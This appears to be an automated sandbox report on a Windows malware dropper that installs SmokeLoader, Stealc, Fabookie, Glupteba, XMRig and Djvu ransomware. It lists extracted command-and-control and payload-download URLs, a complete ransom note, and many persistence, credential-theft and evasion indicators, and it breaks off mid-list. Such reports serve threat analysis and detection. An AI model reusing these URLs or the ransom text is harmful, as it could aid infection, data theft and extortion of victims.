Analysis
-
max time kernel
274s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
26-01-2024 13:07
Static task
static1
Behavioral task
behavioral1
Sample
latestrocki.exe
Resource
win7-20231129-en
General
-
Target
latestrocki.exe
-
Size
9.3MB
-
MD5
aca54a0ddb87930dc31fe9123c46d76d
-
SHA1
ea2b2453cdff42d802117ab302028c9614a83a43
-
SHA256
9587bda655a2dc730e4bdbd7de5ab39bc37de697fe22f449a6b2f851adaedfb8
-
SHA512
0ce4c6283f9112413e247d3dc79e033afa90321f55f36eb9cb1b38f051987ca3b9c808c5b323112fefe702cb56c90a0006421a2ec46e343e4d1c04ecf63aa44e
-
SSDEEP
196608:Zlzk48Er+gQjoW4fsySabpuYf8GLgB4cmNYqp5eiQt1Cz7Zy:ZKPgAEUy5bpjrLg7mia5JQt1C5
Malware Config
Extracted
smokeloader
pub1
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Extracted
fabookie
http://app.alie3ksgaa.com/check/safe
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
djvu
http://habrafa.com/test1/get.php
-
extension
.cdcc
-
offline_id
LBxKKiegnAy53rpqH3Pj2j46vwldiEt9kqHSuMt1
-
payload_url
http://brusuax.com/dl/build2.exe
http://habrafa.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-iVcrVFVRqu Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0846ASdw
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral2/memory/4380-111-0x00000230416C0000-0x00000230417EE000-memory.dmp family_fabookie -
Detect ZGRat V1 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023282-583.dat family_zgrat_v1 behavioral2/files/0x0007000000023282-584.dat family_zgrat_v1 -
Detected Djvu ransomware 7 IoCs
resource yara_rule behavioral2/memory/4056-471-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4056-475-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4056-473-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4056-487-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4988-496-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4988-499-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4988-497-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 5 IoCs
resource yara_rule behavioral2/memory/1820-60-0x0000000002E40000-0x000000000372B000-memory.dmp family_glupteba behavioral2/memory/1820-63-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1820-190-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/5016-387-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1168-446-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/memory/1724-573-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1724-572-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4512 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation CA85.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 43EE.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation work.exe -
Executes dropped EXE 29 IoCs
pid Process 2112 InstallSetup7.exe 2732 sc.exe 1820 31839b57a4f11171d6abc8bbc4451ee4.exe 3160 BroomSetup.exe 4380 rty25.exe 1816 FirstZ.exe 4440 Conhost.exe 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 1168 csrss.exe 216 injector.exe 5056 powershell.exe 4636 windefender.exe 3952 windefender.exe 2360 powercfg.exe 4056 CA85.exe 512 CA85.exe 4988 CA85.exe 3064 reakuqnanrkn.exe 1256 E2FF.exe 3368 E9B7.exe 1392 43EE.exe 852 work.exe 4968 fesa.exe 1004 5EE9.exe 4816 stub.exe 3784 ajabbsc 464 dcb505dc2b9d8aac05f4ca0727f5eadb.exe 3156 wup.exe 4928 csrss.exe -
Loads dropped DLL 38 IoCs
pid Process 2112 InstallSetup7.exe 2112 InstallSetup7.exe 4440 Conhost.exe 4440 Conhost.exe 348 RegAsm.exe 348 RegAsm.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe 4816 stub.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5088 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0009000000023266-461.dat upx behavioral2/memory/4636-464-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/files/0x0009000000023266-463.dat upx behavioral2/files/0x0009000000023266-460.dat upx behavioral2/memory/1724-567-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1724-571-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1724-573-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1724-572-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1724-570-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1724-569-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1724-568-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b0ab8daf-bfeb-4b59-ae20-9db51ac7eedd\\CA85.exe\" --AutoStart" CA85.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe reakuqnanrkn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Conhost.exe File opened for modification C:\Windows\system32\MRT.exe FirstZ.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4968 fesa.exe 4968 fesa.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2360 set thread context of 4056 2360 powercfg.exe 233 PID 512 set thread context of 4988 512 CA85.exe 238 PID 3064 set thread context of 2940 3064 reakuqnanrkn.exe 263 PID 3064 set thread context of 1724 3064 reakuqnanrkn.exe 261 PID 1256 set thread context of 3156 1256 E2FF.exe 296 PID 3368 set thread context of 348 3368 E9B7.exe 301 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3204 sc.exe 2544 sc.exe 3264 sc.exe 2468 sc.exe 3592 sc.exe 5100 sc.exe 3928 sc.exe 4736 sc.exe 4408 sc.exe 2732 sc.exe 408 sc.exe 968 sc.exe 1640 sc.exe 4092 sc.exe 2096 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 63 IoCs
pid pid_target Process procid_target 3388 1820 WerFault.exe 95 1660 1820 WerFault.exe 95 1404 1820 WerFault.exe 95 1060 1820 WerFault.exe 95 4028 1820 WerFault.exe 95 1392 1820 WerFault.exe 95 2256 1820 WerFault.exe 95 4344 1820 WerFault.exe 95 2680 1820 WerFault.exe 95 4988 1820 WerFault.exe 95 2652 1820 WerFault.exe 95 2628 1820 WerFault.exe 95 4128 1820 WerFault.exe 95 320 1820 WerFault.exe 95 1128 1820 WerFault.exe 95 4008 1820 WerFault.exe 95 2404 1820 WerFault.exe 95 3948 1820 WerFault.exe 95 3204 1820 WerFault.exe 95 2116 5016 WerFault.exe 146 4608 5016 WerFault.exe 146 3684 5016 WerFault.exe 146 768 5016 WerFault.exe 146 792 5016 WerFault.exe 146 3736 5016 WerFault.exe 146 1984 5016 WerFault.exe 146 4092 5016 WerFault.exe 146 2984 5016 WerFault.exe 146 4984 1168 WerFault.exe 176 4964 1168 WerFault.exe 176 3736 1168 WerFault.exe 176 4116 1168 WerFault.exe 176 4220 1168 WerFault.exe 176 2484 1168 WerFault.exe 176 2400 4440 WerFault.exe 114 2624 1168 WerFault.exe 176 3264 1168 WerFault.exe 176 4512 1168 WerFault.exe 176 3228 1168 WerFault.exe 176 4980 1168 WerFault.exe 176 4584 1168 WerFault.exe 176 3096 1168 WerFault.exe 176 4092 1168 WerFault.exe 176 5028 1168 WerFault.exe 176 4724 4988 WerFault.exe 238 4936 1168 WerFault.exe 176 2332 1168 WerFault.exe 176 2128 1168 WerFault.exe 176 2828 1168 WerFault.exe 176 3096 1168 WerFault.exe 176 228 1168 WerFault.exe 176 3364 1168 WerFault.exe 176 1300 1168 WerFault.exe 176 2828 1168 WerFault.exe 176 5044 4928 WerFault.exe 345 3192 4928 WerFault.exe 345 3852 4928 WerFault.exe 345 1620 4928 WerFault.exe 345 2636 4928 WerFault.exe 345 4084 4928 WerFault.exe 345 2924 4928 WerFault.exe 345 1544 4928 WerFault.exe 345 2252 4928 WerFault.exe 345 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ajabbsc Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ajabbsc Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ajabbsc Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sc.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Conhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4660 schtasks.exe 628 schtasks.exe 1272 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3472 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 404 tasklist.exe -
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 131 Go-http-client/1.1 HTTP User-Agent header 132 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1932 = "Russia TZ 11 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2632 = "Norfolk Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2941 = "Sao Tome Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2732 sc.exe 2732 sc.exe 1208 powershell.exe 1208 powershell.exe 1208 powershell.exe 4440 Conhost.exe 4440 Conhost.exe 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 1820 31839b57a4f11171d6abc8bbc4451ee4.exe 1820 31839b57a4f11171d6abc8bbc4451ee4.exe 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3756 powershell.exe 3756 powershell.exe 3568 Process not Found 3568 Process not Found 3756 powershell.exe 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found 3568 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2732 sc.exe 5056 powershell.exe 3784 ajabbsc -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1208 powershell.exe Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeDebugPrivilege 1820 31839b57a4f11171d6abc8bbc4451ee4.exe Token: SeImpersonatePrivilege 1820 31839b57a4f11171d6abc8bbc4451ee4.exe Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeDebugPrivilege 3756 powershell.exe Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeDebugPrivilege 516 powershell.exe Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeDebugPrivilege 3284 Conhost.exe Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: 